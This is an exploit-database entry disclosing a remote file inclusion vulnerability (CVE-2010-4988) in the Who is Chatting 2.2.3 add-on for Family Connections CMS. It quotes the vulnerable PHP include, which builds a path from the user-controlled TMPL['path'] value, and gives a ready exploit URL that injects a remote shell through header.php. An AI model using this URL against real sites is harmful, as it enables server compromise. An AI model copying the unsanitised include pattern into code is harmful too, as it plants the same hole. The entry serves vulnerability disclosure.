Family Connections Who is Chatting AddOn - Remote File Inclusion

Author: lumut--
type: webapps
platform: php
port: 
date_added: 2010-07-03 
date_updated: 2010-07-03 
verified: 0 
codes: CVE-2010-4988;OSVDB-76981 
tags: 
aliases:  
screenshot_url:  
application_url: 

*=======================================================
Who is Chatting 2.2.3 Remote File Include Vulnerability
=======================================================

# Author         : lumut--
# Script Details : http://www.familycms.com/downloads/details.php?file=50
# Bugs           :

<?
$chat_inc = $TMPL[\'path\'] . \"inc/chatting_inc.php\";
include_once ($chat_inc);
?>

# Expl: http://server/mod_chatting/themes/default/header.php?TMPL[path]=[shell]

# Greetz & Thanks: cr4wl3r, team_elite, kisame, virusfree, doniskynet,
manadocoding*